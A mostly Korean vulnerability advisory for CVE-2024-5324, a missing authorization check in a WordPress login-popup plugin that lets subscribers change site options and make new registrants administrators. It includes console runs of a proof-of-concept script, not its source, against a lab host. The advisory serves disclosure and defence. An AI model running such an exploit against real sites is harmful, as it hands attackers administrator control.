
로그인/회원가입 팝업 ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - 임의 옵션 업데이트에 대한 인증 누락
Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - 인증 누락으로 인한 임의 옵션 업데이트 취약점
WordPress용 Login/Signup Popup ( Inline Form + Woocommerce ) 플러그인은 2.7.1~2.7.2 버전에서 'import_settings' 함수에 대한 권한 확인이 누락되어 데이터의 무단 수정에 취약합니다. 이로 인해 구독자 수준 이상의 인증된 공격자가 영향을 받는 사이트에서 임의의 옵션을 변경할 수 있습니다. 이를 통해 새 사용자 등록을 활성화하고 새 사용자의 기본 역할을 관리자로 설정할 수 있습니다.
Severity: high
CVE ID: CVE-2024-5324
CVSS Score: 8.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: easy-login-woocommerce
WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default